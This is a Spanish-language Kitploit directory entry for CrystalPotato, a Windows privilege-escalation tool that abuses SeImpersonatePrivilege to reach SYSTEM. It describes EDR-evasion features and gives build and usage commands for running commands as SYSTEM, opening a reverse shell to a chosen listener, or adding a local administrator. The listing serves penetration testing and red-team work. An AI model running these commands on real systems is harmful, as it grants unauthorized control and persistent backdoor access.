Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CrystalPotato — Port en Crystal de GodPotato para abusar de SeImpersonatePrivilege con syscalls indirectas, resolución dinámica de API y ofuscación de cadenas en tiempo de compilación. Ejecuta comandos, shells inversas o agrega usuarios. | Kitploit
Herramientas/GitHubGitHub/ricardojoserf/crystalpotato
Escalada de PrivilegiosExplotaciónPost-ExplotaciónPruebas de PenetraciónRed TeamingAtaque Adversario
GitHubricardojoserf/crystalpotato

CrystalPotato

Port en Crystal de GodPotato para abusar de SeImpersonatePrivilege con syscalls indirectas, resolución dinámica de API y ofuscación de cadenas en tiempo de compilación. Ejecuta comandos, shells inversas o agrega usuarios.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver RepositorioSitio web
8hace 1 díaAún no revisado

CrystalPotato

Puerto en Crystal de GodPotato, una escalada de privilegios local desde cuentas con SeImpersonatePrivilege a SYSTEM. Funciona abusando del Resolver OXID de DCOM y de la suplantación de canalizaciones con nombre.

Las APIs de Windows se resuelven dinámicamente y se invocan mediante stubs de syscall indirectos, todas las cadenas están ofuscadas con XOR en tiempo de compilación y, por defecto, solo se imprime la salida del comando. Probado en Windows 10, 11 y Server 2025.

CrystalPotato

Compilación

CrystalPotato se compila en un único archivo sin dependencias utilizando Crystal en Windows:

root@kitploit:~
crystal build CrystalPotato.cr -o CrystalPotato.exe --release --static

Uso

Ejecutar un comando, iniciar una reverse shell o crear un administrador local.

root@kitploit:~
CrystalPotato.exe -c <COMMAND>
CrystalPotato.exe -H <LHOST> -P <LPORT> [-c <SHELL>]
CrystalPotato.exe -u <USER> -pw <PASS>

img2

Fuentes

  • GodPotato - Implementación original en C# por BeichenDream.

  • RustPotato - Implementación en Rust por safedv.

  • SigmaPotato - Implementación en C# con funcionalidades adicionales por tylerdotrar.

Descargar herramienta
FlagDescripción
-c CMDComando a ejecutar como SYSTEM o shell para la reverse shell (predeterminado: cmd.exe)
-H HOSTHost del listener de la reverse shell
-P PORTPuerto del listener de la reverse shell
-u USERCrear administrador local - Nombre de usuario
-pw PASSCrear administrador local - Contraseña
-p NAMENombre personalizado de la canalización (predeterminado: Crystal)
-dSalida de depuración
-ddTraza completa
-hMostrar ayuda